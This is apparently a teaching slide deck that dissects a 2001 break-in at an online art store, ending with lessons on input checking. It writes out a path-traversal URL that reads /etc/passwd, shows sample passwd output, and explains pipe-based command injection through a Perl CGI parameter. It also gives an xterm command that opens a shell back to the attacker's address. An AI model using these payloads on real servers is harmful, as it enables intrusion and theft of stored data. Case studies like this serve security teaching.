![Page 1: Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 A hacker stole credit card numbers from the online store’s database](https://reader036.vdocuments.us/reader036/viewer/2022062714/56649d215503460f949f637d/html5/thumbnails/1.jpg)
Hacking Case Study
Sungchul Hong
![Page 2: Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 A hacker stole credit card numbers from the online store’s database](https://reader036.vdocuments.us/reader036/viewer/2022062714/56649d215503460f949f637d/html5/thumbnails/2.jpg)
Acme Art, Inc. Case
• October 31, 2001
• www.acme-art.com
• A hacker stole credit card numbers from the online store’s database.
• Firewall was installed
• Only port 80 and 443 were open
• Computer forensics teams found following;
![Page 3: Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 A hacker stole credit card numbers from the online store’s database](https://reader036.vdocuments.us/reader036/viewer/2022062714/56649d215503460f949f637d/html5/thumbnails/3.jpg)
Server Environment
• Apache 1.312 on Linux system
• Perl CGI script was used
![Page 4: Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 A hacker stole credit card numbers from the online store’s database](https://reader036.vdocuments.us/reader036/viewer/2022062714/56649d215503460f949f637d/html5/thumbnails/4.jpg)
![Page 5: Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 A hacker stole credit card numbers from the online store’s database](https://reader036.vdocuments.us/reader036/viewer/2022062714/56649d215503460f949f637d/html5/thumbnails/5.jpg)
Hacker is looking around web pages and clicking images
![Page 6: Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 A hacker stole credit card numbers from the online store’s database](https://reader036.vdocuments.us/reader036/viewer/2022062714/56649d215503460f949f637d/html5/thumbnails/6.jpg)
![Page 7: Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 A hacker stole credit card numbers from the online store’s database](https://reader036.vdocuments.us/reader036/viewer/2022062714/56649d215503460f949f637d/html5/thumbnails/7.jpg)
http://www.acme-art.com/idex.cgi?page=tahoe1.shtml
![Page 8: Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 A hacker stole credit card numbers from the online store’s database](https://reader036.vdocuments.us/reader036/viewer/2022062714/56649d215503460f949f637d/html5/thumbnails/8.jpg)
Hacker's Move
• HTTP://www.acme-art.com/index.cgi?page=index.cgi
• 10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] “GET /cgi-bin/ HTTP/1.0” 403 272
• Hacker sees that index.cgi accepts a filename as a parameter and displays the contents of that filename.
• He uses index.cgi itself as a parameter to display its own source code
![Page 9: Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 A hacker stole credit card numbers from the online store’s database](https://reader036.vdocuments.us/reader036/viewer/2022062714/56649d215503460f949f637d/html5/thumbnails/9.jpg)
Vulnerability Revealed
*** No parameter type checking ***
Index.cgi page is revealed
![Page 10: Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 A hacker stole credit card numbers from the online store’s database](https://reader036.vdocuments.us/reader036/viewer/2022062714/56649d215503460f949f637d/html5/thumbnails/10.jpg)
Vulnerability
The hacker guesses the system file name and its path.
Then open it.
![Page 11: Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 A hacker stole credit card numbers from the online store’s database](https://reader036.vdocuments.us/reader036/viewer/2022062714/56649d215503460f949f637d/html5/thumbnails/11.jpg)
Error Message Reveals the programming secrete.
![Page 12: Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 A hacker stole credit card numbers from the online store’s database](https://reader036.vdocuments.us/reader036/viewer/2022062714/56649d215503460f949f637d/html5/thumbnails/12.jpg)
![Page 13: Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 A hacker stole credit card numbers from the online store’s database](https://reader036.vdocuments.us/reader036/viewer/2022062714/56649d215503460f949f637d/html5/thumbnails/13.jpg)
Hacker’s Next Move
http://www.acme-art.com/index.cgi?page=/../../../../../../../../../etc/passwd
(write the passwd file into the screen)
![Page 14: Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 A hacker stole credit card numbers from the online store’s database](https://reader036.vdocuments.us/reader036/viewer/2022062714/56649d215503460f949f637d/html5/thumbnails/14.jpg)
Message
• The entire contents of the /etc/passwd file are returned and displayed in the browser.
• Rootx0:0:root/root/bin/bash bin:x:1:1:bin/bin: daemonx:2:2:daemon:/sbin:admx3:4:adm:/var/adm: lp:x4:7:lp:/var/spool/lpd: syncx:5:0:sync:/sbin/bin/sync/shutdown:x:6:0shutdown:/sbin:shutdown halt:x:7:halt:/sbin/ …
![Page 15: Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 A hacker stole credit card numbers from the online store’s database](https://reader036.vdocuments.us/reader036/viewer/2022062714/56649d215503460f949f637d/html5/thumbnails/15.jpg)
Next Move
The hacker uses the pipe character in the file parameter, followed by commands of his choice. Now instead of a file being opened, Perl opens a file handle, which receives the standard output generated by the commands specified in the file name parameter
![Page 16: Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 A hacker stole credit card numbers from the online store’s database](https://reader036.vdocuments.us/reader036/viewer/2022062714/56649d215503460f949f637d/html5/thumbnails/16.jpg)
Code
• ls –la / *reveals files in the root directory• id /* get the process id for index.cgi• which xterm /*path for xterminal• (use hex ‘0A’ for line feed)
• Now hackers can run any commands on the Web server under the security privileges of the “nobody” account.
![Page 17: Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 A hacker stole credit card numbers from the online store’s database](https://reader036.vdocuments.us/reader036/viewer/2022062714/56649d215503460f949f637d/html5/thumbnails/17.jpg)
Use xterm to gain interactive shell access to the Web server.
Xterm –display 10.0.1.21:210.0&
(The xterm command launches an xterm window back to the attacker’s display on 10.0.1.21:0.0)
![Page 18: Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 A hacker stole credit card numbers from the online store’s database](https://reader036.vdocuments.us/reader036/viewer/2022062714/56649d215503460f949f637d/html5/thumbnails/18.jpg)
Hacker’s View
• Bash$ id
• Uid=99(nobody) gid=99(nobody) group=99(nobody)
• Bash$ pwd
• /usr/local/apache/htdocs
• Bash$
![Page 19: Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 A hacker stole credit card numbers from the online store’s database](https://reader036.vdocuments.us/reader036/viewer/2022062714/56649d215503460f949f637d/html5/thumbnails/19.jpg)
Note
• The attacker used port 80 (http port)
• Use only HTTP
• Firewall couldn’t help it.
• Lesson: – All the inputs must be checked.– Do not show unnecessary information.